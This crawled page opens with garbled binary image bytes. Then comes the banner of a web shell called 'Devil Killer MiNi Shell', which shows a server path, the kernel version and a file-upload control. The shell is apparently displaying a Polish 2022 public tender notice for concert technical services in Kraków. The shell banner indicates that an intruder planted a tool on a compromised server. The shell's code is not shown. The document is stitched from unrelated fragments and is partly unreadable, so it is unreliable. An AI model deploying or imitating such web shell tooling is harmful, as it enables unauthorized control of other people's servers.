JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220331/0010579101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Obsługa produkcyjna (wykonawcza) i techniczna-koordynacja, realizacja, montaż, instalacja infrastruktury na koncertach organizowanych przez OKBPP pn. Krakowska Lekcja Śpiewania w 2022r </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Kultury Biblioteka Polskiej Piosenki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120386245</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krakusa 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-535</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@bibliotekapiosenki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bibliotekapiosenki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obsługa produkcyjna (wykonawcza) i techniczna-koordynacja, realizacja, montaż, instalacja infrastruktury na koncertach organizowanych przez OKBPP pn. Krakowska Lekcja Śpiewania w 2022r </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-19cea91e-b0f6-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00105791</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00045320/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa kompleksowego zabezpieczenia od strony technicznej i logistycznej wydarzeń artystycznych organizowanych przez OKBPP w 2022 r. Krakowska Lekcja Śpiewania oraz Memento Vitae</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.bip.krakow.pl/?bip_id=509&amp;mmi=10499 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja odbywa się przy użyci:<br/>miniPortalu https://miniportal.uzp.gov.pl/,<br/>ePUAPu https://obywatel.gov.pl/nforms/ezamowienia<br/>oraz poczty elektronicznej na adres:sekretariat@bibliotekapiosenki.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu<br/>komunikacja odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://obywatel.gov.pl/nforms/ezamowienia oraz poczty<br/>elektronicznej na adres: sekretariat@bibliotekapiosenki.pl<br/>2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu, musi posiadać konto na ePUAP.<br/>3. Wykonawca składa tylko jedną ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku”<br/>dostępnego na ePUAP i udostępnionego również na miniPortalu. Wraz z formularzem należy złożyć pozostałe dokumenty wskazane<br/>w pkt 6.1.1. – 6.1.5. SWZ.<br/>UWAGA!<br/>Uwaga! Wykonawca winien zapoznać się z wytycznymi Urzędu Zamówień Publicznych<br/>udostępnionymi na https://www.uzp.gov.pl/strona-glowna/slideraktualnosci/<br/>jaknalezypodpisacofertewpostacielektronicznej/<br/>jak-nalezy-podpisac-oferte-w postaci-elektronicznej Zgodnie z ww.<br/>wytycznymi podpis składany wyłącznie na ww. „Formularzu do złożenia, zmiany, wycofania oferty lub wniosku” nie wywołuje skutków<br/>w odniesieniu do złożonej za jego pomocą oferty Wykonawcy. Oferta bowiem, zgodnie z art. 63 ustawy, a nie ww. formularz<br/>elektroniczny za pośrednictwem którego jest przekazywana, musi zostać opatrzona właściwym podpisem. W zakresie procedury<br/>podpisywania oferty odpowiednim podpisem, czyli składania właściwego podpisu pod ofertą złożoną w postaci elektronicznej<br/>wskazać należy, iż prawidłowym będzie złożenie oferty w ten sposób, że Wykonawca przekazuje Zamawiającemu zaszyfrowany plik<br/>zawierający ofertę opatrzoną właściwym podpisem lub plik oferty wraz z plikiem podpisu (w przypadku podpisu zewnętrznego), przy<br/>czym opatrzenie oferty podpisem nastąpiło przed zaszyfrowaniem oferty. Dopuszczalne jest również, aby Wykonawca<br/>skompresowanym archiwum dokumentów elektronicznych, które najczęściej zapisane jest w formacie<br/>ZIP) wraz z właściwym podpisem dołączonym jako plik podpisu do paczki dokumentów<br/>elektronicznych przed jej zaszyfrowaniem, o czym wprost stanowi § 8 Rozporządzenia, o którym mowa w pkt 8.4. SWZ. Zatem<br/>podpis może zostać złożony bezpośrednio na pliku z ofertą Wykonawcy lub na „paczce” dokumentów elektronicznych zawierających<br/>ofertę Wykonawcy. Opatrzenie właściwym podpisem oferty (lub paczki) następuje przed czynnością jej zaszyfrowania. Złożenie<br/>podpisu jedynie na „Formularzu do złożenia, zmiany, wycofania oferty lub wniosku” nie jest równoznaczne ze złożeniem podpisu pod<br/>ofertą. Oferta, która została złożona bez opatrzenia właściwym podpisem elektronicznym podlega odrzuceniu na podstawie art. 226<br/>ust. 1 pkt 3 ustawy z uwagi na niezgodność z art. 63 ustawy.<br/>4. Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w „Instrukcji użytkownika<br/>systemu miniPortal oraz Regualminie ePUAP”.<br/>5. Identyfikator postępowania został wskazany w pkt 2. SWZ.<br/>6. W Formularzu Oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP oraz poczty<br/>elektronicznej poprzez które Zamawiający będzie komunikował się z Wykonawcą.<br/>7. Wykonawca może przed upływem terminu do składania ofert wycofać ofertę za pośrednictwem<br/>„Formularza do złożenia, zmiany, wycofania oferty lub wniosku”. Sposób wycofania oferty został<br/>opisany w „Instrukcji użytkownika systemu miniPortal-ePUAP”.<br/>8. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów, informacji i oświadczeń oraz ich cyfrowych<br/>odwzorowań (w tym tzw. kopii elektronicznych) opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>„złożenia, zmiany, wycofania oferty lub wniosku” oraz „komunikacji” wynosi 150 MB, a plików<br/>przesyłanych za pośrednictwem poczty elektronicznej wynosi 40 MB.<br/>c.d. w Informacjach dodatkowych i w pkt 9 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Ośrodek Kultury Biblioteka Polskiej Piosenki, ul. Krakusa 7, Kraków, działając zgodnie<br/>z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 roku (dalej: Rozporządzenie) informuje, że:<br/>1) Administratorem danych osobowych jest Ośrodek Kultury Biblioteka Polskiej Piosenki, ul. Krakusa 7, Kraków.<br/>2) Przystąpienie do postępowania przetargowego stanowi wyrażenie przez wykonawców podlegających ochronie Rozporządzenia<br/>zgody a przetwarzanie ich danych osobowych zgodnie z art. 6 ust. 1 lit. b Rozporządzenia,<br/>3) W Ośrodku został powołany Inspektor Ochrony Danych zgodnie z postanowieniami RODO, kontakt e-mail:<br/>iodo@bibliotekapiosenki.pl z którym można się kontaktować w sprawach związanych z przetwarzaniem danych osobowych przez<br/>Administratora.<br/>4) Dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie<br/>przedmiotowego zamówienia publicznego.<br/>5) Odbiorcami danych osobowych będą osoby lub podmioty którym zostanie udostępniona dokumentacja postępowania w oparciu o<br/>art. 8 oraz art. 96 ust. 3 ustawy Pzp.<br/>6) Dane osobowe będą przetwarzanie przez okres przedawnienia roszczeń przysługujących Zamawiającemu i w stosunku do niego<br/>tj. okres 10 lat. Wszelkie dane przetwarzane na potrzeby rachunkowości oraz ze względów podatkowych przetwarzane będą przez 5<br/>lat od końca roku kalendarzowego w którym powstał obowiązek podatkowy.<br/>7) Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, konsekwencje<br/>niepodania danych wynikają z ustawy Pzp.<br/>8) Wykonawcy zostali pouczeni o możliwości wycofania zgody w dowolnym momencie co jest jednoznaczne z wycofaniem się z<br/>postępowania przetargowego.<br/>9) Wykonawcy mają prawo do żądania od Zamawiającego dostępu do swoich danych osobowych, ich sprostowania, ograniczenia<br/>przetwarzania.<br/>10) W związku z przetwarzaniem danych osobowych przez Administratora przysługuje prawo wniesienia skargi do organu<br/>nadzorczego.<br/>11) Nie przysługuje Pani/Panu:<br/>• w zw. z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych<br/>• prawo do przenoszenia danych osobowych o którym mowa w art. 20 RODO<br/>na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.26.7.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest kompleksowa obsługa produkcyjna (wykonawcza) i techniczna – koordynacja, realizacja,<br/>montaż, instalacja infrastruktury na koncertach organizowanych przez Ośrodek Kultury Biblioteka Polskiej Piosenki pn.<br/>„Krakowska Lekcja Śpiewania” , tj. w 2022<br/>a) KRAKOWSKA LEKCJA ŚPIEWANIA „MAJOWA JUTRZENKA” Z OKAZJI ŚWIĘTA KONSTYTUCJI<br/>b) KRAKOWSKA LEKCJA ŚPIEWANIA „KADRÓWKA 1914”<br/>c) KRAKOWSKA LEKCJA ŚPIEWANIA „RADOSNA NIEPODLEGŁOŚCI” Z OKAZJI ŚWIĘTA NIEPODLEGŁOŚCI<br/>d) KRAKOWSKA LEKCJA ŚPIEWANIA „KOLĘDY DO ŚPIEWANIA PO DOMACH” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79952100-3 - Usługi w zakresie organizacji imprez kulturalnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31527260-6 - Systemy oświetleniowe</p> <p class="mb-0">32340000-8 - Mikrofony i głośniki</p> <p class="mb-0">32342400-6 - Sprzęt nagłaśniający</p> <p class="mb-0">32342410-9 - Sprzęt dźwiękowy</p> <p class="mb-0">44210000-5 - Konstrukcje i części konstrukcji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-05-03 do 2022-12-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">cena 60%<br/>doświadczenie realizatora dźwięku 15%<br/>doświadczenie realizatora światła 10 %<br/>Doświadczenie koordynatora produkcji wykonawczej 15%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie realizatora dźwięku</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie realizatora światła</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie koordynatora produkcji wykonawczej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy – zgodnie z art. 57 pkt 2 ustawy – spełniają warunki udziału w<br/>postępowaniu, tj. w zakresie posiadania zdolności technicznej lub zawodowej, tj.:<br/>1.1. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, należycie wykonali co najmniej trzy (3) usługi obejmujące łącznie obsługę produkcyjną (wykonawczą) i<br/>techniczną w tym koordynację prac, organizację nagłośnienia, oświetlenia oraz wykonania scen o wartości nie mniejszej niż<br/>50 000 złotych brutto każda, w tym co najmniej dwie (2) realizacje transmitowane przez telewizję na żywo oraz co najmniej<br/>jedna (1) realizacja na terenie objętym jedną z form ochrony zabytków w Polsce przewidzianych w ustawie z dnia 23 lipca<br/>2003 r. o ochronie zabytków i opiece nad zabytkami (t.j. z 2021r. poz. 710).<br/>1.2. Skieruje do realizacji zamówienia zespół w składzie:<br/>a) min. 1 osobę pełniąca funkcję realizatora dźwięku, która pełniła rolę realizatora dźwięku w produkcji co najmniej dwóch<br/>wydarzeń muzycznych transmitowanych na żywo przez telewizję.<br/>b) min. 1 osobę pełniąca funkcję realizatora światła, która pełniła rolę realizatora światła w produkcji co najmniej dwóch wydarzeń muzycznych transmitowanych na żywo przez telewizję.<br/>c) min. 1 osobę pełniącą funkcję koordynatora produkcji wykonawczej, która pełniła rolę koordynatora produkcji podczas<br/>realizacji minimum dwóch wydarzeń o wartości nie mniejszej niż 50.000 zł brutto każde <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o aktualności informacji zawartych w oświadczeniu/-ach, o którym/-ch mowa w pkt 6.1.5.1. SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w pkt 5.2. SWZ odpowiednio: <br/>a) samego Wykonawcy lub każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>b) podmiotu/-ów, na którego/-ych zdolnościach technicznych lub zawodowych polega Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu – jeżeli dotyczy.<br/>- sporządzone wg. wzoru w Załączniku nr 6 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>(składany wraz z ofertą) wykaz osób, skierowanych przez wykonawcę do<br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie dysponowania tymi osobami, zgodnie z wzorem stanowiącym zał. nr 4 do SWZ na<br/>potwierdzenie spełniania warunku posiadania doświadczenia, o którym mowa w pkt 5.1.2. SWZ.<br/>2. (składany na wezwanie Zamawiającego) wykaz usług wykonanych, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania<br/>i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane<br/>lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez<br/>podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o<br/>dopuszczenie do udziału w postępowaniu zgodnie z wzorem stanowiącym zał. nr 3 do SWZ, na potwierdzenie spełniania warunku posiadania doświadczenia, o którym mowa w pkt 5.1.1. SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz Oferty, według wzoru stanowiącego Zał. nr 1 do SWZ, wypełniony i podpisany<br/>przez osoby umocowane należycie do reprezentowania Wykonawcy. 2. Wraz z ofertą<br/>Wykonawca składa:1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że<br/>Wykonawca w Formularzu Oferty wskaże dane umożliwiające dostęp do tych dokumentów<br/>samodzielnie przez Zamawiającego, poprzez bezpłatne i ogólnodostępne bazy danych; 2)<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, jeżeli w jego imieniu działa osoba, której umocowanie do reprezentowania nie<br/>wynika z dokumentów wymienionych w pkt 1) powyżej; Opisane powyżej zasady stosuje się odpowiednio do osoby<br/>działającej w imieniu Wykonawców wspólnie ubiegających się o<br/>udzielenie niniejszego zamówienia oraz do osoby działającej w imieniu podmiotu<br/>udostępniającego zasoby.3) Zobowiązanie podmiotu udostępniającego zasoby do oddania do<br/>dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia, lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów, jako dowód polegania na zdolnościach<br/>technicznych lub zawodowych tego podmiotu, w odniesieniu do warunków udziału w<br/>postępowaniu, o których mowa w pkt. 5.1. SWZ – jeżeli dotyczy4) Oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy – przy czym obowiązek ten dotyczy<br/>wyłącznie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 117<br/>ust. 4 ustawy. 5) W celu wstępnego potwierdzenia, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu, zgodnie z art. 125 ust. 1 i ust. 5 ustawy, składa on<br/>odrębne następujące oświadczenia: a) o niepodleganiu wykluczeniu z postępowania oraz b) 